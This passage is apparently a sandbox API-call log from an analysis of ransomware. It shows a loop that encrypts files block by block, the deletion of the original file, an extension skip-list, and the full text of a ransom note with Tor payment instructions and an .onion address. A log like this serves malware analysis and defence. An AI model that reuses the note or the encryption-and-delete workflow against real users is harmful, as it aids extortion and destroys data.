lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.634] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.634] GetLastError () returned 0x0 [0154.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.635] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.635] GetLastError () returned 0x0 [0154.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.635] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.635] GetLastError () returned 0x0 [0154.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.635] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.635] GetLastError () returned 0x0 [0154.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.635] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.635] GetLastError () returned 0x0 [0154.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.635] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.635] GetLastError () returned 0x0 [0154.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.635] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.635] GetLastError () returned 0x0 [0154.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.636] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.636] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.636] GetLastError () returned 0x0 [0154.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.636] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.636] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.636] GetLastError () returned 0x0 [0154.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.636] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.636] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.636] GetLastError () returned 0x0 [0154.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.636] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.636] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.636] GetLastError () returned 0x0 [0154.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.636] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.636] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.636] GetLastError () returned 0x0 [0154.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.636] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.636] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.636] GetLastError () returned 0x0 [0154.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.637] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.637] GetLastError () returned 0x0 [0154.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.637] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.637] GetLastError () returned 0x0 [0154.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.637] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.637] GetLastError () returned 0x0 [0154.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.637] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.637] GetLastError () returned 0x0 [0154.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.637] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.637] GetLastError () returned 0x0 [0154.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.637] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.637] GetLastError () returned 0x0 [0154.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.638] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.638] GetLastError () returned 0x0 [0154.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.638] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.638] GetLastError () returned 0x0 [0154.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.638] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.638] GetLastError () returned 0x0 [0154.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.638] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.638] GetLastError () returned 0x0 [0154.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.638] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0154.638] GetLastError () returned 0x0 [0154.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0154.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0154.638] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0154.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui")) returned 0x20 [0154.639] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0154.639] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui") returned 1 [0154.639] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui")) returned 0 [0154.640] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" [0154.640] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI") returned 1 [0154.640] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\.xXCF35.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\.xxcf35.tmp")) returned 0xcf35 [0154.640] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\.xXCF35.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\.xxcf35.tmp"), dwFlags=0x1) returned 0 [0154.640] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\.xXCF35.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\.xxcf35.tmp")) returned 1 [0154.641] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0154.641] wcslen (_String="OK") returned 0x2 [0154.641] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.641] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.641] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0154.641] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0154.641] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0154.641] FindNextFileW (in: hFindFile=0x9ad778, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0154.641] GetLastError () returned 0x12 [0154.641] FindClose (in: hFindFile=0x9ad778 | out: hFindFile=0x9ad778) returned 1 [0154.642] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0154.642] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.643] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.643] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0154.643] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.643] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.643] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0154.643] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.643] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*.exe") returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*.dll") returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*.lnk") returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*.bat") returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*.ini") returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*.msi") returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*.scf") returned 0 [0154.643] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", pszSpec="*pagefile.sys*") returned 0 